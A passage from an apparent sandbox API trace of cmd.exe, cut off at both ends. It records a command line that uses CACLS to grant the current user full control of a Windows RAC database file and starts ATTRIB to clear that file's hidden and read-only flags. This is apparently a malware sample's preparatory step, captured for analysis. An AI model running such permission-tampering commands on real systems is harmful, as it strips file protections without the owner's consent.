lpcbData=0x22ec08*=0x4) returned 0x0 [0126.539] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x0, lpData=0x22ec10*=0x40, lpcbData=0x22ec08*=0x1000) returned 0x2 [0126.539] RegCloseKey (hKey=0x40) returned 0x0 [0126.539] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ec04 | out: phkResult=0x22ec04*=0x40) returned 0x0 [0126.539] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x0, lpData=0x22ec10*=0x40, lpcbData=0x22ec08*=0x1000) returned 0x2 [0126.539] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x4, lpData=0x22ec10*=0x1, lpcbData=0x22ec08*=0x4) returned 0x0 [0126.539] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x0, lpData=0x22ec10*=0x1, lpcbData=0x22ec08*=0x1000) returned 0x2 [0126.539] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x4, lpData=0x22ec10*=0x0, lpcbData=0x22ec08*=0x4) returned 0x0 [0126.539] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x4, lpData=0x22ec10*=0x9, lpcbData=0x22ec08*=0x4) returned 0x0 [0126.539] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x4, lpData=0x22ec10*=0x9, lpcbData=0x22ec08*=0x4) returned 0x0 [0126.539] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x0, lpData=0x22ec10*=0x9, lpcbData=0x22ec08*=0x1000) returned 0x2 [0126.539] RegCloseKey (hKey=0x40) returned 0x0 [0126.539] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886361 [0126.539] srand (_Seed=0x5b886361) [0126.539] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\"" [0126.539] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\"" [0126.540] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0126.540] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3619a0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0126.540] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0126.540] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0126.540] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0126.540] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0126.540] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0126.540] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0126.540] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0126.540] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0126.540] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0126.540] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0126.541] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0126.541] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0126.541] GetEnvironmentStringsW () returned 0x362390* [0126.541] FreeEnvironmentStringsW (penv=0x362390) returned 1 [0126.541] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0126.541] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0126.541] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0126.541] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0126.541] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0126.541] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0126.541] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0126.541] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0126.541] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0126.541] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0126.541] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f9d0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0126.541] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f9d0, lpFilePart=0x22f9cc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f9cc*="Desktop") returned 0x18 [0126.541] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0126.542] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f74c | out: lpFindFileData=0x22f74c) returned 0x3600d0 [0126.542] FindClose (in: hFindFile=0x3600d0 | out: hFindFile=0x3600d0) returned 1 [0126.542] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f74c | out: lpFindFileData=0x22f74c) returned 0x3600d0 [0126.542] FindClose (in: hFindFile=0x3600d0 | out: hFindFile=0x3600d0) returned 1 [0126.542] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f74c | out: lpFindFileData=0x22f74c) returned 0x3600d0 [0126.542] FindClose (in: hFindFile=0x3600d0 | out: hFindFile=0x3600d0) returned 1 [0126.542] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0126.542] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0126.542] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0126.542] GetEnvironmentStringsW () returned 0x362bb0* [0126.543] FreeEnvironmentStringsW (penv=0x362bb0) returned 1 [0126.543] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0126.543] GetConsoleOutputCP () returned 0x1b5 [0126.570] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0126.570] GetUserDefaultLCID () returned 0x409 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fb10, cchData=128 | out: lpLCData="0") returned 2 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fb10, cchData=128 | out: lpLCData="0") returned 2 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fb10, cchData=128 | out: lpLCData="1") returned 2 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0126.571] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0126.571] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0126.572] GetConsoleTitleW (in: lpConsoleTitle=0x350958, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0126.572] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0126.573] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0126.573] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0126.573] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0126.573] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0126.574] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0126.574] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0126.574] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0126.574] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0126.574] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0126.574] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0126.574] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0126.576] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0126.576] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0126.576] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0126.576] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0126.576] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0126.576] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0126.576] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0126.578] GetConsoleTitleW (in: lpConsoleTitle=0x22f7a4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0126.578] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0126.578] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0126.578] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0126.578] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0126.578] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0126.578] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0126.578] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0126.578] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0126.578] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0126.578] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0126.578] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0126.578] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0126.578] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0126.578] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0126.578] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0126.578] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0126.579] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0126.579] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0126.579] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0126.579] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0126.579] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0126.579] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0126.579] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0126.579] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0126.579] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0126.579] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0126.579] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0126.579] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0126.579] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0126.579] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0126.579] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0126.579] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0126.579] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0126.579] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0126.579] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0126.579] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0126.579] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0126.579] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0126.579] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0126.579] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0126.579] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0126.579] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0126.579] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0126.579] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0126.579] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0126.579] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0126.579] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0126.579] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0126.579] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0126.579] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0126.579] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0126.579] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0126.579] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0126.579] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0126.579] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0126.580] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0126.580] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0126.580] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0126.580] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0126.580] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0126.580] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0126.580] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0126.580] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0126.580] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0126.580] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0126.580] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0126.580] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0126.580] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0126.580] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0126.580] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0126.580] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0126.580] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0126.580] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0126.580] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0126.580] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0126.580] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0126.580] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0126.580] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0126.580] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0126.580] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0126.580] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0126.580] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0126.580] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0126.580] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0126.580] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0126.580] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0126.580] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0126.581] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0126.581] SetErrorMode (uMode=0x0) returned 0x0 [0126.581] SetErrorMode (uMode=0x1) returned 0x0 [0126.581] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x361dd0, lpFilePart=0x22f2c4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f2c4*="Desktop") returned 0x18 [0126.581] SetErrorMode (uMode=0x0) returned 0x1 [0126.581] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0126.581] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0126.588] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0126.588] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x22f040, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f040) returned 0xffffffff [0126.589] GetLastError () returned 0x2 [0126.589] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x22f040, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f040) returned 0xffffffff [0126.589] GetLastError () returned 0x2 [0126.589] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x22f040, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f040) returned 0x350ee8 [0126.589] FindClose (in: hFindFile=0x350ee8 | out: hFindFile=0x350ee8) returned 1 [0126.589] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x22f040, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f040) returned 0xffffffff [0126.589] GetLastError () returned 0x2 [0126.589] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x22f040, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f040) returned 0x350ee8 [0126.590] FindClose (in: hFindFile=0x350ee8 | out: hFindFile=0x350ee8) returned 1 [0126.590] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0126.590] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0126.590] GetConsoleTitleW (in: lpConsoleTitle=0x22f538, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0126.590] InitializeProcThreadAttributeList (in: lpAttributeList=0x22f3c0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22f488 | out: lpAttributeList=0x22f3c0, lpSize=0x22f488) returned 1 [0126.590] UpdateProcThreadAttribute (in: lpAttributeList=0x22f3c0, dwFlags=0x0, Attribute=0x60001, lpValue=0x22f480, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22f3c0, lpPreviousValue=0x0) returned 1 [0126.590] GetStartupInfoW (in: lpStartupInfo=0x22f37c | out: lpStartupInfo=0x22f37c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0126.590] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0126.591] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22f41c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22f468 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x22f468*(hProcess=0x50, hThread=0x4c, dwProcessId=0xfac, dwThreadId=0xfb0)) returned 1 [0126.598] CloseHandle (hObject=0x4c) returned 1 [0126.598] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0126.598] GetEnvironmentStringsW () returned 0x360240* [0126.598] FreeEnvironmentStringsW (penv=0x360240) returned 1 [0126.598] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0126.640] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x22f35c | out: lpExitCode=0x22f35c*=0x0) returned 1 [0126.640] CloseHandle (hObject=0x50) returned 1 [0126.640] _vsnwprintf (in: _Buffer=0x22f4a4, _BufferCount=0x13, _Format="%08X", _ArgList=0x22f368 | out: _Buffer="00000000") returned 8 [0126.640] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0126.640] GetEnvironmentStringsW () returned 0x3622f8* [0126.640] FreeEnvironmentStringsW (penv=0x3622f8) returned 1 [0126.640] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0126.640] GetEnvironmentStringsW () returned 0x3622f8* [0126.640] FreeEnvironmentStringsW (penv=0x3622f8) returned 1 [0126.641] DeleteProcThreadAttributeList (in: lpAttributeList=0x22f3c0 | out: lpAttributeList=0x22f3c0) [0126.641] GetConsoleTitleW (in: lpConsoleTitle=0x22f7a4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0126.641] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0126.641] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0126.641] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0126.641] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x22f040, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f040) returned 0xffffffff [0126.641] GetLastError () returned 0x2 [0126.641] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x22f040, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f040) returned 0xffffffff [0126.642] GetLastError () returned 0x2 [0126.642] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x22f040, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f040) returned 0x35e448 [0126.642] FindClose (in: hFindFile=0x35e448 | out: hFindFile=0x35e448) returned 1 [0126.642] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x22f040, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f040) returned 0xffffffff [0126.642] GetLastError () returned 0x2 [0126.642] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x22f040, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f040) returned 0x35e448 [0126.642] FindClose (in: hFindFile=0x35e448 | out: hFindFile=0x35e448) returned 1 [0126.642] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0126.642] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0126.642] GetConsoleTitleW (in: lpConsoleTitle=0x22f538, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0126.642] InitializeProcThreadAttributeList (in: lpAttributeList=0x22f3c0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22f488 | out: lpAttributeList=0x22f3c0, lpSize=0x22f488) returned 1 [0126.642] UpdateProcThreadAttribute (in: lpAttributeList=0x22f3c0, dwFlags=0x0, Attribute=0x60001, lpValue=0x22f480, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22f3c0, lpPreviousValue=0x0) returned 1 [0126.642] GetStartupInfoW (in: lpStartupInfo=0x22f37c | out: lpStartupInfo=0x22f37c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0126.643] lstrcmpW (lpString1="\\attrib.exe", 